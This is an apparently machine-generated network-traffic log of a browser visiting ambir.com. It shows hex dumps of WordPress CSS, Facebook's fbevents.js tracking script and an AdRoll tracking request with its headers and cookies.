                                                                                                                                                                                              2024-11-20 20:28:35 UTC1369INData Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 3a 20 23 66 37 38 64 61 37 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 72 65 64 3a 20 23 63 66 32 65 32 65 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 3a 20 23 66 66 36 39 30 30 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 61 6d 62 65 72 3a 20 23 66 63 62 39 30 30 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 3a 20 23 37 62 64 63 62 35 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 67 72 65 65 6e 2d 63 79 61 6e 3a
                                                                                                                                                                                              Data Ascii: -color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan:
                                                                                                                                                                                              2024-11-20 20:28:35 UTC1369INData Raw: 2d 62 6f 72 64 65 61 75 78 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 34 2c 32 30 35 2c 31 36 35 29 20 30 25 2c 72 67 62 28 32 35 34 2c 34 35 2c 34 35 29 20 35 30 25 2c 72 67 62 28 31 30 37 2c 30 2c 36 32 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 64 75 73 6b 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35 2c 32 30 33 2c 31 31 32 29 20 30 25 2c 72 67 62 28 31 39 39 2c 38 31 2c 31 39 32 29 20 35 30 25 2c 72 67 62 28 36 35 2c 38 38 2c 32 30 38 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 70 61 6c 65 2d 6f 63 65 61 6e 3a 20 6c 69 6e
                                                                                                                                                                                              Data Ascii: -bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--wp--preset--gradient--luminous-dusk: linear-gradient(135deg,rgb(255,203,112) 0%,rgb(199,81,192) 50%,rgb(65,88,208) 100%);--wp--preset--gradient--pale-ocean: lin
                                                                                                                                                                                              2024-11-20 20:28:35 UTC1369INData Raw: 65 72 65 28 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 30 2e 35 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 30 2e 35 65 6d 3b 7d 62 6f 64 79 20 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 7b 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 7d 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 7b 66 6c 65 78 2d 77 72 61 70 3a 20 77 72 61 70 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 7d 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 20 3e 20 3a 69 73 28 2a 2c 20 64 69 76 29 7b 6d 61 72 67 69 6e 3a 20 30 3b 7d 62 6f 64 79 20 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 7b 64 69 73 70 6c 61 79 3a 20 67 72 69 64 3b 7d 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 20 3e 20 3a 69
                                                                                                                                                                                              Data Ascii: ere(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flex{display: flex;}.is-layout-flex{flex-wrap: wrap;align-items: center;}.is-layout-flex > :is(*, div){margin: 0;}body .is-layout-grid{display: grid;}.is-layout-grid > :i
                                                                                                                                                                                              2024-11-20 20:28:35 UTC1369INData Raw: 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 63 79 61 6e 2d 62 6c 75 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 70 75 72 70 6c 65 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 70 75 72 70 6c 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 62 6c 61 63 6b 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 2d 62 61
                                                                                                                                                                                              Data Ascii: lor: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-color{color: var(--wp--preset--color--vivid-purple) !important;}.has-black-background-color{background-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-ba
                                                                                                                                                                                              2024-11-20 20:28:35 UTC1369INData Raw: 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 70 75 72 70 6c 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 62 6c 61 63 6b 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 77 68 69 74 65 2d 62 6f 72 64 65 72 2d 63 6f 6c
                                                                                                                                                                                              Data Ascii: (--wp--preset--color--vivid-purple) !important;}.has-black-border-color{border-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-border-color{border-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-border-col
                                                                                                                                                                                              2024-11-20 20:28:35 UTC1369INData Raw: 7d 2e 68 61 73 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 67 72 61 64 69 65 6e 74 2d 62 61 63 6b 67 72 6f 75 6e 64 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64 2d 67 72 65 65 6e 2d 63 79 61 6e 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 61 6d 62 65 72 2d 74 6f 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 67 72 61 64 69 65 6e 74 2d 62 61 63 6b 67 72 6f 75 6e 64 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67
                                                                                                                                                                                              Data Ascii: }.has-light-green-cyan-to-vivid-green-cyan-gradient-background{background: var(--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan) !important;}.has-luminous-vivid-amber-to-luminous-vivid-orange-gradient-background{background: var(--wp--preset--g
                                                                                                                                                                                              2024-11-20 20:28:35 UTC1369INData Raw: 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 73 6d 61 6c 6c 2d 66 6f 6e 74 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 73 6d 61 6c 6c 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 6d 65 64 69 75 6d 2d 66 6f 6e 74 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6d 65 64 69 75 6d 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 6c 61 72 67 65 2d 66 6f 6e 74 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6c 61 72 67 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d
                                                                                                                                                                                              Data Ascii: ortant;}.has-small-font-size{font-size: var(--wp--preset--font-size--small) !important;}.has-medium-font-size{font-size: var(--wp--preset--font-size--medium) !important;}.has-large-font-size{font-size: var(--wp--preset--font-size--large) !important;}.has-


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              135192.168.2.549887157.240.195.154431976C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:35 UTC530OUTGET /en_US/fbevents.js HTTP/1.1
                                                                                                                                                                                              Host: connect.facebook.net
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                              Referer: https://ambir.com/
                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                              2024-11-20 20:28:36 UTC1452INHTTP/1.1 200 OK
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                              timing-allow-origin: *
                                                                                                                                                                                              reporting-endpoints: coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", permissions_policy="https://www.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                              report-to: {"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                              content-security-policy: default-src 'self' data: blob: *;script-src 'nonce-PFy0reRJ' *.facebook.com *.fbcdn.net *.facebook.net 127.0.0.1:* blob: data: 'self' https://*.google-analytics.com *.google.com;style-src data: blob: 'unsafe-inline' *;connect-src *.facebook.com facebook.com *.fbcdn.net *.facebook.net wss://*.facebook.com:* wss://*.whatsapp.com:* wss://*.fbcdn.net attachment.fbsbx.com ws://localhost:* blob: *.cdninstagram.com 'self' https://*.google-analytics.com;img-src 'self' data: blob: * https://*.google-analytics.com;block-all-mixed-content;upgrade-insecure-requests;require-trusted-types-for 'script';
                                                                                                                                                                                              document-policy: force-load-at-top
                                                                                                                                                                                              2024-11-20 20:28:36 UTC1694INData Raw: 70 65 72 6d 69 73 73 69 6f 6e 73 2d 70 6f 6c 69 63 79 3a 20 61 63 63 65 6c 65 72 6f 6d 65 74 65 72 3d 28 29 2c 20 61 74 74 72 69 62 75 74 69 6f 6e 2d 72 65 70 6f 72 74 69 6e 67 3d 28 29 2c 20 61 75 74 6f 70 6c 61 79 3d 28 29 2c 20 62 6c 75 65 74 6f 6f 74 68 3d 28 29 2c 20 63 61 6d 65 72 61 3d 28 29 2c 20 63 68 2d 64 65 76 69 63 65 2d 6d 65 6d 6f 72 79 3d 28 29 2c 20 63 68 2d 64 6f 77 6e 6c 69 6e 6b 3d 28 29 2c 20 63 68 2d 64 70 72 3d 28 29 2c 20 63 68 2d 65 63 74 3d 28 29 2c 20 63 68 2d 72 74 74 3d 28 29 2c 20 63 68 2d 73 61 76 65 2d 64 61 74 61 3d 28 29 2c 20 63 68 2d 75 61 2d 61 72 63 68 3d 28 29 2c 20 63 68 2d 75 61 2d 62 69 74 6e 65 73 73 3d 28 29 2c 20 63 68 2d 76 69 65 77 70 6f 72 74 2d 68 65 69 67 68 74 3d 28 29 2c 20 63 68 2d 76 69 65 77 70 6f 72
                                                                                                                                                                                              Data Ascii: permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewpor
                                                                                                                                                                                              2024-11-20 20:28:36 UTC1INData Raw: 2f
                                                                                                                                                                                              Data Ascii: /
                                                                                                                                                                                              2024-11-20 20:28:36 UTC14656INData Raw: 2a 2a 0a 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 31 37 2d 70 72 65 73 65 6e 74 2c 20 46 61 63 65 62 6f 6f 6b 2c 20 49 6e 63 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 0a 2a 0a 2a 20 59 6f 75 20 61 72 65 20 68 65 72 65 62 79 20 67 72 61 6e 74 65 64 20 61 20 6e 6f 6e 2d 65 78 63 6c 75 73 69 76 65 2c 20 77 6f 72 6c 64 77 69 64 65 2c 20 72 6f 79 61 6c 74 79 2d 66 72 65 65 20 6c 69 63 65 6e 73 65 20 74 6f 20 75 73 65 2c 0a 2a 20 63 6f 70 79 2c 20 6d 6f 64 69 66 79 2c 20 61 6e 64 20 64 69 73 74 72 69 62 75 74 65 20 74 68 69 73 20 73 6f 66 74 77 61 72 65 20 69 6e 20 73 6f 75 72 63 65 20 63 6f 64 65 20 6f 72 20 62 69 6e 61 72 79 20 66 6f 72 6d 20 66 6f 72 20 75 73 65 0a 2a 20 69 6e 20 63 6f 6e 6e 65 63 74 69 6f 6e 20 77 69 74
                                                                                                                                                                                              Data Ascii: *** Copyright (c) 2017-present, Facebook, Inc. All rights reserved.** You are hereby granted a non-exclusive, worldwide, royalty-free license to use,* copy, modify, and distribute this software in source code or binary form for use* in connection wit
                                                                                                                                                                                              2024-11-20 20:28:36 UTC16384INData Raw: 22 3f 64 3a 6e 75 6c 6c 3b 72 65 74 75 72 6e 20 62 21 3d 6e 75 6c 6c 26 26 63 21 3d 6e 75 6c 6c 26 26 61 21 3d 6e 75 6c 6c 26 26 64 21 3d 6e 75 6c 6c 3f 7b 64 6f 6d 61 69 6e 5f 75 72 69 3a 62 2c 65 76 65 6e 74 5f 74 79 70 65 3a 63 2c 65 78 74 72 61 63 74 6f 72 5f 74 79 70 65 3a 64 2c 69 64 3a 61 7d 3a 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 67 28 61 29 7b 69 66 28 61 3d 3d 6e 75 6c 6c 7c 7c 28 74 79 70 65 6f 66 20 61 3d 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 22 75 6e 64 65 66 69 6e 65 64 22 3a 69 28 61 29 29 21 3d 3d 22 6f 62 6a 65 63 74 22 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 61 3d 61 2e 65 78 74 72 61 63 74 6f 72 5f 63 6f 6e 66 69 67 3b 69 66 28 61 3d 3d 6e 75 6c 6c 7c 7c 28 74 79 70 65 6f 66 20 61 3d 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 22
                                                                                                                                                                                              Data Ascii: "?d:null;return b!=null&&c!=null&&a!=null&&d!=null?{domain_uri:b,event_type:c,extractor_type:d,id:a}:null}function g(a){if(a==null||(typeof a==="undefined"?"undefined":i(a))!=="object")return null;a=a.extractor_config;if(a==null||(typeof a==="undefined"?"
                                                                                                                                                                                              2024-11-20 20:28:36 UTC16384INData Raw: 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 67 2c 68 2c 69 2c 6a 29 7b 76 61 72 20 6b 3d 7b 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 6b 2e 65 78 70 6f 72 74 73 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 61 3d 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 53 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 54 79 70 65 64 22 29 2c 62 3d 61 2e 54 79 70 65 64 3b 61 2e 63 6f 65 72 63 65 3b 61 2e 65 6e 66 6f 72 63 65 3b 61 3d 62 2e 61 72 72 61 79 4f 66 28 62 2e 6f 62 6a 65 63 74 57 69 74 68 46 69 65 6c 64 73 28 7b 61 6c 6c 6f 63 61 74 69 6f 6e 3a 62 2e 6e 75 6d 62 65 72 28 29 2c 63 6f 64 65 3a 62 2e 73 74 72 69 6e 67 28 29 2c 6e 61 6d 65 3a 62 2e 73 74 72 69 6e 67 28 29 2c 70 61 73 73 52 61 74 65 3a 62 2e 6e 75
                                                                                                                                                                                              Data Ascii: urn function(g,h,i,j){var k={exports:{}};k.exports;(function(){"use strict";var a=f.getFbeventsModules("SignalsFBEventsTyped"),b=a.Typed;a.coerce;a.enforce;a=b.arrayOf(b.objectWithFields({allocation:b.number(),code:b.string(),name:b.string(),passRate:b.nu
                                                                                                                                                                                              2024-11-20 20:28:36 UTC16384INData Raw: 66 22 29 2c 63 3d 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 53 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 54 79 70 65 64 22 29 2c 64 3d 63 2e 54 79 70 65 64 2c 65 3d 63 2e 63 6f 65 72 63 65 3b 66 75 6e 63 74 69 6f 6e 20 67 28 61 2c 63 2c 66 2c 67 2c 68 29 7b 61 3d 65 28 61 2c 62 29 3b 63 3d 65 28 63 2c 64 2e 73 74 72 69 6e 67 28 29 29 3b 76 61 72 20 6a 3d 7b 7d 3b 66 21 3d 6e 75 6c 6c 26 26 28 74 79 70 65 6f 66 20 66 3d 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 22 75 6e 64 65 66 69 6e 65 64 22 3a 69 28 66 29 29 3d 3d 3d 22 6f 62 6a 65 63 74 22 26 26 28 6a 3d 66 29 3b 66 3d 67 21 3d 6e 75 6c 6c 26 26 74 79 70 65 6f 66 20 67 3d 3d 3d 22 73 74 72 69 6e 67 22 3f 67 3a 6e 75 6c 6c 3b 67 3d 7b 7d 3b 68 21 3d 6e 75 6c 6c 26 26 28 74 79 70
                                                                                                                                                                                              Data Ascii: f"),c=f.getFbeventsModules("SignalsFBEventsTyped"),d=c.Typed,e=c.coerce;function g(a,c,f,g,h){a=e(a,b);c=e(c,d.string());var j={};f!=null&&(typeof f==="undefined"?"undefined":i(f))==="object"&&(j=f);f=g!=null&&typeof g==="string"?g:null;g={};h!=null&&(typ
                                                                                                                                                                                              2024-11-20 20:28:36 UTC1727INData Raw: 5b 61 5b 31 5d 5d 3d 62 29 3b 72 65 74 75 72 6e 20 62 21 3d 3d 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 6e 28 61 29 7b 76 61 72 20 62 3d 5b 5d 3b 61 3d 6a 5b 61 2e 69 64 5d 7c 7c 7b 7d 3b 66 6f 72 28 76 61 72 20 63 20 69 6e 20 61 29 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 61 2c 63 29 26 26 62 2e 70 75 73 68 28 61 5b 63 5d 29 3b 72 65 74 75 72 6e 20 62 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 61 29 7b 72 65 74 75 72 6e 20 6e 28 61 29 2e 6c 65 6e 67 74 68 3e 30 7d 66 75 6e 63 74 69 6f 6e 20 70 28 61 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 65 2c 61 29 3f 65 5b 61 5d 3a 61 7d 66 75 6e 63 74 69 6f
                                                                                                                                                                                              Data Ascii: [a[1]]=b);return b!==null}function n(a){var b=[];a=j[a.id]||{};for(var c in a)Object.prototype.hasOwnProperty.call(a,c)&&b.push(a[c]);return b}function o(a){return n(a).length>0}function p(a){return Object.prototype.hasOwnProperty.call(e,a)?e[a]:a}functio
                                                                                                                                                                                              2024-11-20 20:28:36 UTC14657INData Raw: 74 73 52 65 73 6f 6c 76 65 64 4d 6f 64 75 6c 65 73 3d 3d 6e 75 6c 6c 29 72 65 74 75 72 6e 3b 69 66 28 74 68 69 73 2e 6d 6f 64 75 6c 65 45 6e 63 6f 64 69 6e 67 73 3d 3d 6e 75 6c 6c 29 72 65 74 75 72 6e 3b 76 61 72 20 66 3d 62 28 67 2e 66 62 71 2e 5f 5f 66 62 65 76 65 6e 74 73 52 65 73 6f 6c 76 65 64 4d 6f 64 75 6c 65 73 2c 64 2e 6f 62 6a 65 63 74 28 29 29 3b 69 66 28 66 3d 3d 6e 75 6c 6c 29 72 65 74 75 72 6e 3b 66 3d 6b 28 69 28 6a 28 66 29 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 63 2e 6d 6f 64 75 6c 65 45 6e 63 6f 64 69 6e 67 73 2e 6d 61 70 21 3d 6e 75 6c 6c 26 26 61 20 69 6e 20 63 2e 6d 6f 64 75 6c 65 45 6e 63 6f 64 69 6e 67 73 2e 6d 61 70 3f 63 2e 6d 6f 64 75 6c 65 45 6e 63 6f 64 69 6e 67 73 2e 6d 61 70 5b 61 5d 3a 6e 75 6c 6c 7d 29
                                                                                                                                                                                              Data Ascii: tsResolvedModules==null)return;if(this.moduleEncodings==null)return;var f=b(g.fbq.__fbeventsResolvedModules,d.object());if(f==null)return;f=k(i(j(f),function(a){return c.moduleEncodings.map!=null&&a in c.moduleEncodings.map?c.moduleEncodings.map[a]:null})
                                                                                                                                                                                              2024-11-20 20:28:36 UTC16384INData Raw: 3d 62 2e 6d 61 70 2c 65 3d 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 53 69 67 6e 61 6c 73 50 61 72 61 6d 4c 69 73 74 22 29 2c 68 3d 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 73 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 53 65 6e 64 42 65 61 63 6f 6e 22 29 2c 69 3d 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 73 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 53 65 6e 64 47 45 54 22 29 2c 6a 3d 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 73 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 53 65 6e 64 58 48 52 22 29 3b 62 3d 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 53 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 45 76 65 6e 74 73 22 29 3b 76 61 72 20 6c 3d 62
                                                                                                                                                                                              Data Ascii: =b.map,e=f.getFbeventsModules("SignalsParamList"),h=f.getFbeventsModules("signalsFBEventsSendBeacon"),i=f.getFbeventsModules("signalsFBEventsSendGET"),j=f.getFbeventsModules("signalsFBEventsSendXHR");b=f.getFbeventsModules("SignalsFBEventsEvents");var l=b
                                                                                                                                                                                              2024-11-20 20:28:36 UTC16384INData Raw: 21 3d 3d 22 6f 62 6a 65 63 74 22 7c 7c 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 61 29 7c 7c 61 3d 3d 6e 75 6c 6c 29 74 68 72 6f 77 20 6e 65 77 20 67 28 29 3b 72 65 74 75 72 6e 20 61 7d 7d 66 75 6e 63 74 69 6f 6e 20 73 28 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 28 74 79 70 65 6f 66 20 61 3d 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 22 75 6e 64 65 66 69 6e 65 64 22 3a 69 28 61 29 29 21 3d 3d 22 6f 62 6a 65 63 74 22 26 26 74 79 70 65 6f 66 20 61 21 3d 3d 22 73 74 72 69 6e 67 22 7c 7c 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 61 29 7c 7c 61 3d 3d 6e 75 6c 6c 29 74 68 72 6f 77 20 6e 65 77 20 67 28 29 3b 72 65 74 75 72 6e 20 61 7d 7d 66 75 6e 63 74 69 6f 6e 20 74 28 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 61 29 7b
                                                                                                                                                                                              Data Ascii: !=="object"||Array.isArray(a)||a==null)throw new g();return a}}function s(){return function(a){if((typeof a==="undefined"?"undefined":i(a))!=="object"&&typeof a!=="string"||Array.isArray(a)||a==null)throw new g();return a}}function t(){return function(a){


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              136192.168.2.54988354.255.252.1684431976C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:35 UTC993OUTGET /segment/GXXT3DJJNNBKHGBC62RAND/PQV7D44IFRBCBMEQBHSAR6?adroll_fpc=d3ee31a855380a6a19350bbaa666e259-1732134512472&flg=1&pv=74305401830.21593&arrfrr=https%3A%2F%2Fambir.com%2Fambir-card-scanners%2F&cookie=&adroll_s_ref=&keyw=&p0=12769&adroll_external_data=&xa4=1&adroll_version=2.0 HTTP/1.1
                                                                                                                                                                                              Host: d.adroll.com
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                              Origin: https://ambir.com
                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                              Referer: https://ambir.com/
                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                              Cookie: __adroll=16b1e49ed627599a8c527b960adbb83e-a_1732134513; receive-cookie-deprecation=1; receive-cookie-deprecation=1; __adroll_shared=16b1e49ed627599a8c527b960adbb83e-a_1732134513
                                                                                                                                                                                              2024-11-20 20:28:36 UTC2134INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:36 GMT
                                                                                                                                                                                              Content-Type: image/gif
